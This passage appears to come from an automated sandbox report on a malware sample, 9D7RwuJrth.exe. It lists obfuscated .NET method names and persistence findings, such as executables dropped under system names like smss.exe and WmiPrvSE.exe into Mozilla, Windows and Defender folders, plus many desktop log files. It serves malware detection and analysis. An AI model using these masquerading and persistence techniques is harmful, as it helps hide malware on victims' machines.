Source: 9D7RwuJrth.exe, udYiN5nRk01noMkjSh0.cs	High entropy of concatenated method names: 'rGgJGLlip2', 'dRmoAY7fVd4fVRr3GVs6', 'VJcT0t7fNOXDFKAcLjMX', 'l7SU8K7fE04aqd6L6LCI', 'ByS1oS7fUYkPBeEA7hWx', 'kt5', 'Q1SnrkpygU', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 9D7RwuJrth.exe, xHHWssLjtLM5HDyYro6.cs	High entropy of concatenated method names: 'X3eLWyFeVm', 'VLeLdirOvE', 'On7LXco6KN', 'ljZQLP7tFIIJ6q9wLjFX', 'z84sXh7toNAwHdBkMEah', 'hKfLMVlOoF', 'NZELI9FYtb', 'DFtHjd7tknxybuHlBFmS', 'qH8JA57txhLeA0XMbQbl', 'MK4Dsh7tl1DmQIBUiTOM'
Source: 9D7RwuJrth.exe, GjEnXyMKLa4vNBC1o3j.cs	High entropy of concatenated method names: 'DiFMwRgD0C', 'mLqMvfnbMk', 'qSAMgGdeVm', 'GQqM5sZ1OX', 'FMLMsfvd7L', 'z3lXk47EvxXBAAYwEjF2', 'WCwYBN7EpASglbDmkTTg', 'LM2BAq7EwrTaoroN5Md2', 'bkxfCR7EgPXgP6IO8tLa', 'YGOerx7E53fD1qMUyZpF'
Source: 9D7RwuJrth.exe, XkslydbQ5qbReFkJwFB.cs	High entropy of concatenated method names: 'Lc6bZ5gGhq', 'B0BbBJubR1', 'mThE317JmDVEOVTf9F1H', 'xdfHTM7JeCe0rOYSLY4Y', 'JgoswD7JYO7hvJVRRR6k', 'fDH5H47J0t4Zi36SDYke', 'yya9UG7JROGg9gXvBMnN', 'jQq4yx7J8SXPH3osNFxn', 'Df9ltm7JrMn0XiZJ0FBG'
Source: 9D7RwuJrth.exe, yhIixf2PTXCmMxPFKj5.cs	High entropy of concatenated method names: 'L2Z20aA4q2', 'XH0kXd7lO6suG8WnNg0Y', 'p7yGc57lkkjbGnu1VwGi', 'biwnHB7lxLow5hadit6t', 'gVM2wt7lFoEWd0JcTe7S', 'bOc2Yy4e6K', 'llFUM57lJPtlgEVEfJHJ', 'Wqd21Z7ltHjfkm05sBR5', 'igGYCu7lnlnPOeGtXo3M', 'c5sGuI7llUI0oWDTQZcp'
Source: 9D7RwuJrth.exe, RJTGxX46rJ1duYg4E8M.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'u0w72TVWm3v', 'LGc747LGLGo', 'Gi8HqK7A19uNFtVCcdcX', 'VfpVXr7AWHkDyhClBNyP', 'XljCJX7AdhfKCPFCav6q'
Source: 9D7RwuJrth.exe, yGIN4Z7DchOOk5g1ZHh.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'jU0727axoL0', 'LGc747LGLGo', 'aPrJDL7d93PKDdoDrfTa', 'D0dD8g7d7XhoyaSHVxAO', 'vbuZhm7dq2tUhmGPGIPC', 'OgCfnb7dTtYgfNVsHI0E'
Source: 9D7RwuJrth.exe, l8XmwgqLRUwXJuooeBh.cs	High entropy of concatenated method names: 'd55qbjiTmY', 'DxGq2D6SR8', 'GqVqQuF33o', 'b8bqH3s0R9', 'I5T5jV7d3lHVJSXCla8T', 'fYhfHj7dywePg2AsMhWc', 'r56tpK7dGKvXptJXV37k', 'MvAxv47djseSSNsjgq7X', 'JFXxas7dPVBtUKcEsxi0', 'V38bru7de0FtLVWQfwKu'
Source: 9D7RwuJrth.exe, hVNNmV3rJ7hE1neC3ad.cs	High entropy of concatenated method names: 'NFXmyfSsKS', 'PFEmGUhKNH', 'q8tEIf7FaKkymGG5ulMw', 'vVVXSl7FF0nR7L0vTEr5', 'Psu6mF7FodrIqo8umu88', 'QkuYO27FNry9DK46yNW5', 'OtQLod7FEasAD6u09LWR', 'hsfmmYgXot', 'yiqBWD7FcUy3gsgM2cQ5', 'SqgdmP7FUTjT1N6C9TK3'
Source: 9D7RwuJrth.exe, id8trMwt1C8muCcnUi0.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'GGGwJ9aflX', 'g6xr5k7gmSAcWONATCwS', 'd4AI147g0fGtMjILq6Zf', 'R3ywE17gRJKNGLHjOcQO', 'OHpOTQ7g87uo68ioyrfH', 'qRRMlp7grTWZPdACGDye', 'JHokIJ7gM08pcZLbvGJG'
Source: 9D7RwuJrth.exe, Po1l4J8ydxJsrZv1w8J.cs	High entropy of concatenated method names: 'r1cM7nCMlb', 'edB4pU7E64GiLXTccNJ6', 'WkmLnD7EMmLGnLr2umsu', 'yLg21X7EInjTOK3YRy55', 'M3eh5n7E1oqQVYYIRvHA', 'yrW83yJL6K', 'lsT8jUv4vq', 'Nw28PaOH7k', 'FEH8egiJ6E', 'aCM8YwKkAJ'
Source: 9D7RwuJrth.exe, hPD8gXFtFFjovtNn204.cs	High entropy of concatenated method names: 'jS3FJw0l98', 'rIfFlGP3uM', 'dsbFiC1nLj', 'D4JFks45R1', 'uK2FxG3kfD', 'VLVFO7nmyq', 'tCRFFp4OB6', 'ypiFo5Ho4q', 'X8VFae2rHb', 'R8cFNo2YA7'
Source: 9D7RwuJrth.exe, hKTSZNe530RPbETdA2.cs	High entropy of concatenated method names: 'DpQltDQUg', 'j3dhEG71JUFilSwfFpeY', 'OF2mRK71l5ZoKH1110IO', 'UsWABK71tyAfiervnSW3', 'cMUTeD71ngccwNHfhehx', 'GH7mpIAOJ', 'zMJ0pI4Kq', 'WveRGNbpY', 'Enc8dCbTi', 'GkUrsOk5e'
Source: 9D7RwuJrth.exe, bsemlnbatBnoibwHoVd.cs	High entropy of concatenated method names: 'kaNbgOtcHO', 'tFRb5MMnnD', 'v9HWOB7lHm4P63tT610j', 'od9cdl7lZGsvPxf1FhMW', 'qmiKIT7lBrBnZ9SPJiJU', 'cBZbEhoI9B', 'D2WbVlVPr4', 'MtnbU8t8gJ', 'q4mbhT2tkA', 'xJ7bco4kAg'
Source: 9D7RwuJrth.exe, LwsEa6uYwx7BwL7Dxjj.cs	High entropy of concatenated method names: 'xHtuXKmDOh', 'RtSuAZBk53', 'stbuthKQa1', 'GI2unw1d4X', 'IP9uJ1LQ7W', 'kYxuljcxKl', 'ynOuiTAtoY', 'vb2ukt6t6b', 'VPiuxdlmd9', 'XDHuOaYopH'
Source: 9D7RwuJrth.exe, ou2jGV2WtuERulUdHUK.cs	High entropy of concatenated method names: 'g8s2Xf1r6Y', 'WU32AfLNvq', 'XJU2tBOuof', 'Lhd2nKOVyT', 'hxq2JZGVKp', 'sKh2l5tTBn', 'oIPpv07lvQPTkWlsllGa', 'fjKNWP7lguMR48UOSy7i', 'UPHqWn7l5rV5P1bdkkpX', 'uTctAI7lsuuTew7aC6yH'
Source: 9D7RwuJrth.exe, Ly0aOF2HaCYt4VBjvLS.cs	High entropy of concatenated method names: 'sN52BkQO47', 'r3X2yK2ugt', 'tYa2GvDMEh', 'rYHIs17lIrBLqujALCaD', 'IyKn397l65QaJ3HAXmY2', 'Ch7Rwq7lrmewRJpP6Qw5', 'jL20OY7lMk8ZSgkYLsNl', 'Kol9yg7l1234ncUxYCoE', 'c3y3q27lWVIRn6uJEfQ0', 'pZUbKq7ldIJNpvLSErZK'
Source: 9D7RwuJrth.exe, JDLyxaRjfbCNj5tGa7q.cs	High entropy of concatenated method names: 'sbYFCx7NmAL5QTta5vRN', 'O11Zki7N0FQr0VQRtugC', 'N5HoOV7Ne96hWkRWw4n1', 'xBcgwL7NYM5uD7LhNRJN', 'method_0', 'method_1', 'bosRew2blg', 'YQwRYyIEJs', 'krWRmtvs3N', 'OsUR0XuK9N'
Source: 9D7RwuJrth.exe, xPDFM8gyIlVEH8qyHel.cs	High entropy of concatenated method names: 'cNIgjBK6s6', 'iDRgmSZsGn', 'vTGg8BR0V9', 'FX2grxLo3Z', 'XfvgMSeVvK', 'SgZgIbcNrR', 'hbQg65NCll', 'v0Ug1AISFS', 'Dispose', 'Yy30Zg75pEQNs8EwSE2r'
Source: 9D7RwuJrth.exe, bWqvhkCIlWprXwWuSmG.cs	High entropy of concatenated method names: 'DSeCtCfiTb', 'eOZ4Uc7no4NFw724kNk7', 'NjOyYk7nOrRqMU1lOO4A', 'tomeTc7nFJNfTDS9jBUG', 'oZ2yFn7na8JJDBApDug3', 'MrSvsw7nNmkiyAiUYN5O', 'E94', 'P9X', 'vmethod_0', 'zqV740wPF6X'
Source: 9D7RwuJrth.exe, oj0d00LFhbMWexGnIyD.cs	High entropy of concatenated method names: 'q64', 'P9X', 'dk274G0vNnO', 'vmethod_0', 'gYr72C8gC0N', 'imethod_0', 'snoLub7tfwjsvj7QV3qc', 'QTmTlZ7tK551P8pB4lDh', 'RehTHN7tpTo10P5clI4B', 'CgmJ0K7tw0iE1QdonoMO'
Source: 9D7RwuJrth.exe, ikKtwGLQMK5arGTybLf.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'bNm72LIMUnx', 'LGc747LGLGo', 'HoARso7tekAV6hrpLw5E', 'wRnVJI7tYOGZqwUFnFTD', 'Hdf4HB7tmynBFDIbvJoT', 'SwDQHF7t0XeKUvwDOG7x'
Source: 9D7RwuJrth.exe, vx8nOYb7BXmrY7rpWvR.cs	High entropy of concatenated method names: 'w51bTjx4Go', 'ViEb46KydY', 'RfibLuc6Vi', 'YMbXQx7JQfElYfyHyWeJ', 'zHf0ND7JHXUFiViXj6rC', 'uwsOvl7JZ9cyE0wNoD5I', 'Mc4Kyk7JBlCOMmvurW8C', 'GiGN8T7JysUAY62aT6ac', 'BortHg7JGovo4T7ZlKs1', 'SJ9VV47J31dIxIJjeMQ7'
Source: 9D7RwuJrth.exe, CkFgc9LldtD6jVTopH2.cs	High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'YrQ74ZACZ7S', 'lwaLkaZOJZ', 'imethod_0', 'p5x0aq7tNOWBkIkRgb01', 'gYnOc07tEHixUxMeVSHC', 'NRsGQa7tVNjhKy0sI1HF', 'Y13o3G7tUyBSfReodmMu'
Source: 9D7RwuJrth.exe, xGBpRT2U9IROgndOioA.cs	High entropy of concatenated method names: 'bLM2gHwryL', 'bNkEfZ7iGxjKDjkHMyJS', 'WX3Oas7iBxLlUTFZSdch', 'ndHhiB7iyRnHKRWDRHDy', 'Lt9bZ87i3BqywqPRy9jV', 'utmGL97ijS7lnge5C2Gm', 'P9X', 'vmethod_0', 'JSx74Wrj58Z', 'imethod_0'
Source: 9D7RwuJrth.exe, aNcrPDlxt3Os5kHufCN.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'nQFlFCTplI', 'c64lo06ynG', 'QDulaKhj30', 'DTilN700Dc', 'fhSlEsL7PI', 'jwYlVvhZFR', 'dyepRM7Kx4TXHBvgmHwm'

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\haeBUeau.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RfxtYLmQ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XYaTBrrE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\VNPvpVFD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\MbDxwcVz.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\aOwTdXyg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\YqcMQKie.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\hdVuXvrH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\zuvWKvqh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ywOZehbx.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HiuOyNKb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\xBgoYyEi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\fkHAryTS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\gmasiRfw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\YvkCHKYH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\wvgrNMIh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\fkGLlyFI.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\gqAKFZhr.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RoOvQmlu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\CJLfMmRu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\TMiCdAAw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\iayrzvUL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\BjyqpIYV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\MsfvwPWb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\zHFGLnTh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\KebpbcGE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\EvEoCbHu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RngMDvMV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\GQJohFLp.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\jrYzshHe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HGufhKgM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\zgMHUZTa.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\BwryKsoE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\UAlWJNil.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\gxIrOcDq.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\oTbQbbYz.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\czckklIZ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\imHaAnxM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\uILHvqzR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\TideCjWs.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\QfjBlGMR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\xJQGDhfo.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\IonNSomK.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\rrlpDagQ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\MPcmOdeg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\pdjZooeB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\kcQjpOfp.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XujdOCGR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ZDFmwSFw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\nzWIOABa.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\QJwUIRwB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\VfEmYjln.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\MFWOLyZB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\xtqXCEKK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\SFRmUDLH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\lkUrzNzM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\cvCSNcGe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\brYbblpC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\DpMeoAtV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\gGCbQipO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\lZsrLOuk.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XOCTRFXH.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\QnTUQpnW.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\cItldMID.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\CvcPWQun.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\NhwwQEyh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\bHyKcPKg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\yNVrtDVA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\cLlTmcma.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\aghuugwS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\dsdajcUY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\fnytvPjf.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\LsLFRydK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\tPKQwznS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\BRrXbneT.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ijPsrWTp.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rEFrcoVj.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\uMlYSzCN.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ZWwCXoEW.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\dVAarBMu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rgoKfKUN.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HENwTSHn.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\YrKlkCVM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\sUsSQXQL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RUOvtANV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\NZNelUXb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XprDnjwZ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OdqVYMoD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RXHdCRrs.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\tojirtOm.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\JpYWvPZP.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OQhlWUKC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\VBmvCWAb.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\COJNZQhv.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ZRpBnocC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\infrqIKS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rMoKHXwo.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\smiIylww.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rNXibPjW.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\qKWRQFlK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\IpLeIKzQ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XgJlfaRK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OLjDJquB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\GfifQgAx.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\kOAKeIBA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\tLkzZqkX.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\KrawoXqF.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\xFRjkDBd.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ANxQZOiH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\QLdDWJUZ.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\YiicOEwG.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\vhcgKXhJ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XQkCfxwg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\yWtgjqCG.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\kjAKCvZY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\nSHawKfi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HBUOKBdR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\sOOpvBpu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\QfdDtvsy.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OPbwNHKO.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\quKhiaRV.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\jOdAThRi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\kWkcJscF.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\vVohbyWj.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\guQJELZU.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\JENuXwBf.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\oOOAVsVq.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\AVufnTwx.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rAfaFgSo.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\SYsmfrex.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ZELbGgFk.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\TcjfiIuK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ITFobKbD.log	Jump to dropped file
